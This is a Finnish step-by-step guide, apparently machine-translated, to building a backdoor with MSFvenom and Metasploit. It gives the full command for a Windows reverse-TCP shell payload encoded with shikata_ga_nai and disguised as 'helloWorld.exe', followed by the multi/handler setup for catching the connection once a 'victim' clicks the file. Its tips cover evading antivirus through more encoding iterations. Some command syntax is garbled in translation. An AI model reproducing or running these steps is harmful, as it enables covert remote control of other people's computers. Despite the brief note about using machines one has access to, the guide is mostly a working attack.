Takaovia käytetään ohittamaan turvamekanismeja, usein salaa ja enimmäkseen havaitsemattomasti. Käyttämällä MSFvenomia, msfpayloadin ja msfencoden yhdistelmää, on mahdollista luoda takaovi, joka yhdistää takaisin hyökkääjään käyttämällä käänteisen kuoren TCP: tä. Takaoven kehittämiseksi sinun on muutettava haittaohjelmasi allekirjoitus välttämään virustentorjuntaohjelmisto. Suorita tämä projekti parilla tietokoneella, joiden käyttöoikeus sinulla on, ja opit samalla lisää tietokoneen turvallisuudesta ja siitä, miten tällainen takaovi toimii.
Askeleet
Vaihe 1. Käynnistä Kali ja käynnistä terminaalikonsoli
Vaihe 2. Kirjoita ifconfig näyttääksesi käyttöliittymän ja tarkista IP -osoitteesi
Vaihe 3. Kirjoita msfvenom -l -enkooderit näyttääksesi enkooderiluettelon
Käytät koodina x86/shikata_ga_nai
Vaihe 4. Kirjoita "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -platform windows määrittää käytettävän arkkitehtuurin.
- -p windows/shell/reverse_tcp määrittää upotettavat hyötykuormat.
- LHOST määrittää kuuntelijan IP -osoitteen.
- LPORT tarkoittaa kuunteluporttia.
- -b "\ x00" ilmaisee huonoja merkkejä (null -tavua).
- -e x86/shikata_ga_nai ilmaisee kooderin nimen.
- -f exe> helloWorld.exe osoittaa muodon ulostulon.
Vaihe 5. Aktivoi Metasploit kirjoittamalla msfconsole
Nyt olet luonut takaovesi. Kun uhri napsauttaa helloWorld.exe -tiedostoa, sulautettu kuorman hyötykuorma aktivoituu ja muodostaa yhteyden takaisin järjestelmääsi. Saadaksesi yhteyden sinun on avattava Metasploitin monikäsittelijä ja asetettava hyötykuormat
Vaihe 6. Kirjoita use exploit/multi/handler
Vaihe 7. Kirjoita set payload windows/shell/reverse_tcp
Vaihe 8. Tarkista moduuli kirjoittamalla Näytä vaihtoehdot
Vaihe 9. Kirjoita joukko LHOST 192.168.48.129
"LHOST" tarkoittaa kuuntelijan IP -osoitetta
Vaihe 10. Kirjoita joukko LPORT 4444
"LPORT" tarkoittaa kuunteluporttia
Vaihe 11. Kirjoita run ja odota yhteyttä uhrin koneelta
Vaihe 12. Odota, että uhri napsauttaa helloWorld.exe -tiedostoa
Sitten sinut yhdistetään onnistuneesti uhrin koneeseen.
Vinkkejä
- Käyttämällä -i MSFvenomissa edustaa koodauksen iteraatiot. Joskus useammat iteroinnit voivat auttaa välttämään AV -ohjelmiston.
- Olet oppinut luomaan takaoven ja koodattuna MSFvenomin avulla, mutta tämä menetelmä ei toimi täydellisesti nykyään joitakin AV -ohjelmistoja vastaan. Syynä tähän ovat MSFvenomin suoritusmallit. AV -toimittajat ovat lisänneet näiden mallien staattisen allekirjoituksen ja etsivät niitä. Ratkaisu tähän ongelmaan on käyttää eri suoritusmallia tai erilaisia työkaluja.